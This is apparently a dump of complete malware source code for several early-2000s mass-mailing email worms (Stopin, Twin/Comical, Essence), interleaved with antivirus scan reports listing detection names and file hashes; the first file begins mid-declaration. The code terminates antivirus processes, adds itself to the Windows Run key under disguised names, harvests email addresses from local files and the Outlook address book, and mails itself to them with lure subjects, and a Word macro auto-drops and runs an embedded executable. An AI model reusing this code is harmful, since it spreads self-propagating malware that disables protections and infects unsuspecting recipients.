sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
DWORD type=REG_SZ;
FILE *stopv;

LHANDLE session;
MapiMessage mess;
MapiRecipDesc from;
HINSTANCE hMAPI;

HKEY hReg;
PROCESSENTRY32 uProcess;
SYSTEMTIME systime;
WIN32_FIND_DATA ffile;
HDC dc;

void Welcome();
void StopAV(char *);
void FindFile(char *,char *);
void GetMail(char *,char *);
void sendmail(char *);
void FeedBack();

//ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
/*
// Worm in RegisterServiceProcess
HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
if(kern32) {
(FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
} */

// Fuck some AntiVirus hahahaha
StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm

GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);

strcpy(sysdr,sysdir);
strcat(sysdr,"\\MSGDI32.EXE");
if((lstrcmp(filename,sysdr))!=0) {
Welcome();
}
else
{
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);

_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf

end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm

Tmp dd 0
end_all_asm:
}
FindFile(desktop,"*.htm");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(winhtm,".ht*");
FindFile(cache,".ht*");
FreeLibrary(hMAPI);
FeedBack();
}

strcat(sysdir,"\\MsGDI32.exe");
CopyFile(filename,sysdir,FALSE);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100);
RegCloseKey(hReg);

}
void Welcome()
{
register char fileWel[100],messWel[25],titWel[25];
strcpy(fileWel,filename);
fileWel[0]=0;
for(i=strlen(filename);i>0 && filename[i]!='\\';i--);
wsprintf(titWel,"Error - %s",fileWel+i+1);
wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1);
MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND);
}

void StopAV(char *antivirus)
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}

void FindFile(char *folder, char *ext)
{
register bool abc=TRUE;
register HANDLE hFile;
char mail[128];
SetCurrentDirectory(folder);
hFile=FindFirstFile(ext,&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
GetMail(ffile.cFileName,mail);
if(strlen(mail)>0) {
WritePrivateProfileString("EMail found",mail,"send","singlung.txt");
sendmail(mail);
}
abc=FindNextFile(hFile,&ffile);
}
}
}

void GetMail(char *namefile, char *mail)
{
HANDLE hf,hf2;
char *mapped;
DWORD size,i,k;
BOOL test=FALSE,valid=FALSE;
mail[0]=0;

hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
if(hf==INVALID_HANDLE_VALUE)
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf);
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}

i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}

void sendmail(char *tos)
{
memset(&mess,0,sizeof(MapiMessage));
memset(&from,0,sizeof(MapiRecipDesc));

from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject="Secret for you...";
mess.lpszNoteText="Hi Friend,\n\n"
"I send you my last work.\n"
"Mail me if you have some suggests.\n\n"
" See you soon. Best Regards.";

mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos;
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="My_Work.exe";
mess.nFileCount=1;

mess.lpOriginator=&from;

mSendMail(0,0,&mess,0,0);
free(mess.lpRecips);
free(mess.lpFiles);
}

void FeedBack()
{
GetSystemTime(&systime);
switch(systime.wDay) {
case 7:
MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"
"With this, you stop the life of women and children.",
"Message to USA",MB_OK|MB_ICONHAND);
break;

case 11:
dc=GetDC(NULL);
if(dc)
{
TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50);
}
ReleaseDC(NULL,dc);
break;

case 28:
stopv=fopen("StopIntifada.htm","w");
fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n");
fprintf(stopv,"<body bgcolor=blue text=yellow>\n");
fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n");
fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n");
fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n");
fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n");
fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n");
fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n");
fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE BOTH:</font><BR>\n");
fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n");
fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT ! </font><BR><BR>\n");
fprintf(stopv,"<font>Thanx to read this.</font></p>\n");
fprintf(stopv,"</body></html>");
fclose(stopv);
ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED);

break;
}
}
File SingLung.exe received on 05.16.2009 19:40:32 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Stopin!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Stopin.worm.29184
AntiVir 7.9.0.168 2009.05.15 Worm/Stopin.A
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Stopin
Authentium 5.1.2.4 2009.05.16 -
Avast 4.8.1335.0 2009.05.15 Win32:Stopin
AVG 8.5.0.336 2009.05.15 I-Worm/Stopin
BitDefender 7.2 2009.05.16 Win32.StopIn.A@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Stopin.a
ClamAV 0.94.1 2009.05.16 W32.Stopin.b
Comodo 1157 2009.05.08 Worm.Win32.Stopin.B
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Stopin.60928
eSafe 7.0.17.0 2009.05.14 Win32.Stopin.a
eTrust-Vet 31.6.6508 2009.05.16 Win32/Stopin.B
F-Prot 4.4.4.56 2009.05.16 -
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Stopin.a
Fortinet 3.117.0.0 2009.05.16 W32/Stopin.B
GData 19 2009.05.16 Win32.StopIn.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Stopin
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Stopin.a
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Stopin.a
McAfee 5616 2009.05.15 W32/Stopin.b@MM
McAfee+Artemis 5616 2009.05.15 W32/Stopin.b@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Stopin.A
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.W@mm
NOD32 4080 2009.05.15 Win32/Stopin.B
Norman 6.01.05 2009.05.16 W32/Stopin.A
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Stopin.29184
Panda 10.0.0.14 2009.05.16 W32/Stopin.A
PCTools 4.4.2.0 2009.05.16 I-Worm.Stopin.A
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Singlung.a
Sophos 4.41.0 2009.05.16 W32/Stopin-A
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Stopin.a
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Stopin.a
TrendMicro 8.950.0.1092 2009.05.15 PAK_Generic.001
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Stopin
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Stopin
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Stopin.A

Additional information
File size: 29184 bytes
MD5...: 460f48b7d7bde2517c1a9a9042682f28
SHA1..: f6ced460439e443aa957c2765328f3b99dcdd252
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
' Name : W97M-W32.Twin
' Author : PetiK
' Language : VBA Word & Assembler
' Date : 01/02/2002
' Size : 2701 byte

Attribute VBA_ModuleType=VBAModule
Sub twin
Sub AutoOpen()
win = Environ("windir")
thisfile = ActiveDocument.Name
full = ActiveDocument.FullName

MsgBox "This file has some problems", vbCritical, thisfile

e = "exe="""
e = e + "4D5A50000200000..."
e = e + "000...000000000000"
e = e + "0000000000"
e = e + """"

f = "fso.CopyFile """
f = f + full
f = f + """, win&""\NetInfo.doc"""
Open "C:\Twin.vbs" For Output As #1
Print #1, "On Error Resume Next"
Print #1, "Set fso=CreateObject(""Scripting.FileSystemObject"")"
Print #1, "Set w=CreateObject(""WScript.Shell"")"
Print #1, "Set win=fso.GetSpecialFolder(0)"
Print #1, "Set Twin=CreateObject(""Outlook.Application"")"
Print #1, "Set deux=Twin.GetNameSpace(""MAPI"")"
Print #1, "Set c=fso.CreateTextFile(""C:\backup.win"")"
Print #1, "c.Close"
Print #1, "For Each polux In deux.AddressLists"
Print #1, "If polux.AddressEntries.Count <> 0 Then"
Print #1, "For jumeaux = 1 To polux.AddressEntries.Count"
Print #1, "Set castor = polux.AddressEntries(jumeaux)"
Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)"
Print #1, "c.WriteLine castor.Address"
Print #1, "c.Close"
Print #1, "Next"
Print #1, "End If"
Print #1, "Next"
Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)"
Print #1, "c.WriteLine ""#"""
Print #1, "c.Close"
Print #1, ""
Print #1, e
Print #1, "lire=decr(exe)"
Print #1, "Set exfile=fso.CreateTextFile(win&""\AVW32.exe"",true)"
Print #1, "exfile.Write lire"
Print #1, "exfile.Close"
Print #1, f
Print #1, "w.Run win&""\AVW32.exe"", 1, False"
Print #1, "Function decr(octet)"
Print #1, "For hexa = 1 To Len(octet) Step 2"
Print #1, "decr = decr & Chr(""&h"" & Mid(octet, hexa, 2))"
Print #1, "Next"
Print #1, "End Function"
Close #1
Shell "wscript C:\Twin.vbs", vbHide
End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "Message for " & Application.UserName & vbCrLf & "How Are You"
.Heading = "W97M/W32ASM.Twin.Worm"
.Animation = msoAnimationSendingMail
.Button = msoButtonSetOK
.Show
End With
End Sub
End Sub

W32 ASM CODE OF THE HEX FILE INTO WORD DOCUMENT

comment #
Name : I-Worm.Twin
Author : PetiK
Date : January 30th 2002 - February 1st 2002
Size : 6656 bytes

Action : See for yourself. It's not complex.
#

.586p
.model flat
.code

JUMPS

api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start: push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA

push 25
push esi
push 1
@pushsz "AntiVirus Freeware"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA

@pushsz "C:\twin.vbs"
api DeleteFileA

push 50
push offset pathname
api GetWindowsDirectoryA
@pushsz "\NetInfo.doc"
push offset pathname
api lstrcat
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet

push 0
push 0
push 3
push 0
push 1
push 80000000h
@pushsz "C:\backup.win"
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax

push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp

push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi

push 0
push ebx
api GetFileSize
cmp eax,3
jbe end_w3

scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:

end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle

end_worm:
push 0
api ExitProcess

send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
orig_worm db 50 dup (0)
pathname db 50 dup (0)
mail_addr db 128 dup (?)
inet dd 0
sess dd 0

subject db "A comical story for you.",0


body db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah
db 9,"Best Regards. You friend.",0
filename db "comical_story.doc",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach

MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?

MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset pathname
dd offset filename
dd ?

end start
end

MODULE VBA TWIN IN WORD DOCUMENT


File Twin.exe received on 05.16.2009 19:41:08 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Comical.worm.6656
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.10
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!2f2b
Avast 4.8.1335.0 2009.05.15 Win32:Comical
AVG 8.5.0.336 2009.05.15 W97M/Comical.EXE
BitDefender 7.2 2009.05.16 Win32.Comical.A@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Comical.A
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Comical.A
F-Prot 4.4.4.56 2009.05.16 W32/Malware!2f2b
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik.PL@mm
GData 19 2009.05.16 Win32.Comical.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/Comical@MM
McAfee+Artemis 5616 2009.05.15 W32/Comical@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.10
Microsoft 1.4602 2009.05.16 Worm:Win32/Comical.A@mm
NOD32 4080 2009.05.15 Win32/Comical.A
Norman 6.01.05 2009.05.16 W32/Petik.AR
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.6656.B
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.16 I-Worm.Conical.A
Prevx 3.0 2009.05.16 High Risk Worm
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.h
Sophos 4.41.0 2009.05.16 W32/Comical-A
Sunbelt 3.2.1858.2 2009.05.16 W32.Comical@mm
Symantec 1.4.4.12 2009.05.16 W32.Comical@mm
TheHacker 6.3.4.1.326 2009.05.15 W32/Comical@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_COMICAL.A
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Twin
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Conical.A

Additional information
File size: 6656 bytes
MD5...: 3da254ab9def856d64f0779ea6a6057f
SHA1..: 31a005985a793d2b8e84dd747c3fa17c721ddf60
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
File Twin.doc received on 05.16.2009 19:41:06 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 W97M/Comical
AntiVir 7.9.0.168 2009.05.15 W2000M/Comical.A@mm
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.16 W97M/Comical.A@mm
Avast 4.8.1335.0 2009.05.15 MW97:Comical-A
AVG 8.5.0.336 2009.05.15 W97M/Comical
BitDefender 7.2 2009.05.16 Win32.Comical.A(W97M)
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 O97M.GNsm
eTrust-Vet 31.6.6508 2009.05.16 W97M/Comical.A:mm
F-Prot 4.4.4.56 2009.05.16 W97M/Comical.A@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W97M/Comical.A@mm
GData 19 2009.05.16 Win32.Comical.
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Macro.Comical
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W97M/Comical@MM
McAfee+Artemis 5616 2009.05.15 W97M/Comical@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Comical.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Comical.A@mm
NOD32 4080 2009.05.15 W97M/Comical.A
Norman 6.01.05 2009.05.16 W97M/Comical.A@mm
nProtect 2009.1.8.0 2009.05.16 Win32.Comical.A(W97M)
Panda 10.0.0.14 2009.05.16 W97M/Generic
PCTools 4.4.2.0 2009.05.16 WORD.97.Conical.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Unknown Micro Virus
Sophos 4.41.0 2009.05.16 WM97/Comical-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 W97M.Comical@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 W97M_COMICAL.A
VBA32 3.12.10.5 2009.05.16 Virus.W97M.Petik
ViRobot 2009.5.15.1737 2009.05.15 W97M.Comical.A
VirusBuster 4.6.5.0 2009.05.16 WORD.97.Conical.A

Additional information
File size: 65536 bytes
MD5...: 079275bdaf0058642f3b062b3aef4de3
SHA1..: 0fe4a31077176828ec545b7ca3c5e92ea59a7352
SHA256: 46a11a3b520a234a4408010d57a0bd28589526f3248e16fc71ccf4cf8db31595
/*
Name : I-Worm.Essence
Author : PetiK
Date : February 3rd 2002
Language : C++

Thanx to Bumblebee.

*/

#include <windows.h>
#include <mapi.h>
#include <memory.h>
#pragma argused

void Welcome();
void attachname();
void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr);

char filename[100],sysdir[100],sysdr[100],attname[20];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run";

HINSTANCE hMAPI;
LHANDLE sess;
MapiMessage *mess;
char messId[512];
char subject[1024],
address[1024],
server[1024],
body[8192];
long i,j;
char *tmp;

MSG msg;
HKEY hReg;

ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);


ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mSaveMail)(LHANDLE, ULONG, lpMapiMessage, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);

strcpy(sysdr,sysdir);
strcat(sysdr,"\\MSIE32.EXE");
if((lstrcmp(filename,sysdr))!=0) {
Welcome();
strcat(sysdir,"\\Msie32.exe");
CopyFile(filename,sysdir,FALSE);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Microsoft IE",0,REG_SZ,(BYTE *)sysdir,100);
RegCloseKey(hReg);
// WriteProfileString("WINDOWS","RUN",sysdir);
// WriteProfileString(NULL,NULL,NULL);
return 0;
}

hMAPI=LoadLibrary("MAPI32.DLL");
if(!hMAPI)
return -1;
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
if(!mLogon)
return -1;
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
if(!mLogoff)
return -1;
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
if(!mFindNext)
return -1;
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
if(!mReadMail)
return -1;
(FARPROC &)mSaveMail=GetProcAddress(hMAPI, "MAPISaveMail");
if(!mSaveMail)
return -1;
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
if(!mSendMail)
return -1;
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
if(!mFreeBuffer)
return -1;

mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&sess);
SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST);
while(GetMessage(&msg,NULL,0,0))
if(mFindNext(sess,0,NULL,NULL,MAPI_LONG_MSGID|
MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(sess,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
if(lstrlen(mess->lpszSubject)>2)
if(mess->lpszSubject[strlen(mess->lpszSubject)-1]!=' ' && mess->lpszSubject[strlen(mess->lpszSubject)-2]!=' ') {
mFreeBuffer(mess);
SetThreadPriority(NULL,THREAD_PRIORITY_HIGHEST);
if(mReadMail(sess,NULL,messId,MAPI_SUPPRESS_ATTACH|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
body[0]=0;
if(mess->lpszNoteText) {
wsprintf(body,"Hi '%s', you wrote me :\n##########\n- ",mess->lpOriginator->lpszName);
for(i=0,j=lstrlen(body);i<lstrlen(mess->lpszNoteText) && j<512;i++,j++) {
body[j]=mess->lpszNoteText[i];
if(body[j]=='\n') {
body[j]=0;
lstrcat(body,"\n- ");
j+=2;
}
}
body[j]=0;
}
for(i=0;j<lstrlen(address) && address[i]!='@';i++);
if(i>lstrlen(address))
wsprintf(body,"smtp.%s",address+i+1);
else
wsprintf(body,"smtp.yahoo.com");
if(j>=512)
lstrcat(body,"...");
else
lstrcat(body," ");
wsprintf(body+strlen(body),"\n##########\n\n %s auto-reply:\n\n",server);
lstrcat(body,"I can not reply now.\nLook at this attachment and mail me if you have some suggests.\n\n");
wsprintf(subject,"Re: %s ",mess->lpszSubject);
wsprintf(address,"%s",mess->lpOriginator->lpszAddress);
MessageBox(NULL,body,subject,MB_OK|MB_ICONINFORMATION);
sendmail(sess,subject,body,address);
tmp=(char *)malloc(strlen(mess->lpszSubject)+3);
strcpy(tmp,mess->lpszSubject);
free(mess->lpszSubject);
tmp[strlen(tmp)+2]=0;
tmp[strlen(tmp)]=' ';
tmp[strlen(tmp)-1]=' ';
mess->lpszSubject=tmp;
mSaveMail(sess,NULL,mess,MAPI_LONG_MSGID,NULL,messId);
mFreeBuffer(mess);
SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST);
}
} else
mFreeBuffer(mess);
}
} while(mFindNext(sess,0,NULL,messId,MAPI_LONG_MSGID|
MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS);
}
mLogoff(sess,0,0,0);
FreeLibrary(hMAPI);

}
void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr)
{
char *name[]={"readme","clickme","lookthis","urgent","newgame","winanholiday",
"hello","ForU","important"};
char *ext1[]={".mp3",".htm",".jpg",".gif",".html",".mpeg",".mpg",".htm",".vbs",
".zip",".rar"};
char *ext2[]={".exe",".com",".pif",".scr"};
attname[0]=0;
strcat(attname,name[GetTickCount()&8]);
strcat(attname,ext1[GetTickCount()&10]);
strcat(attname,ext2[GetTickCount()&3]);
MapiMessage mes;
MapiRecipDesc from;
memset(&mes,0,sizeof(MapiMessage));
memset(&from,0,sizeof(MapiRecipDesc));
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mes.lpszSubject=msubject;
mes.lpszNoteText=mbody;
mes.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mes.lpRecips)
return;
memset(mes.lpRecips,0,sizeof(MapiRecipDesc));
mes.lpRecips->lpszName=mailaddr;
mes.lpRecips->lpszAddress=mailaddr;
mes.lpRecips->ulRecipClass=MAPI_TO;
mes.nRecipCount=1;
mes.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mes.lpFiles)
return;
memset(mes.lpFiles,0,sizeof(MapiFileDesc));
mes.lpFiles->lpszPathName=filename;
mes.lpFiles->lpszFileName=attname;
mes.nFileCount=1;

mes.lpOriginator=&from;

mSendMail(sess,0,&mes,0,0);

free(mes.lpRecips);
free(mes.lpFiles);
}

void Welcome()
{
Sleep(750);
MessageBox(NULL,"Software installed on the system.","SETUP",MB_OK|MB_ICONINFORMATION);
}
File Essence.scr received on 05.16.2009 11:31:23 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Stopin!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Stopin.worm.24064
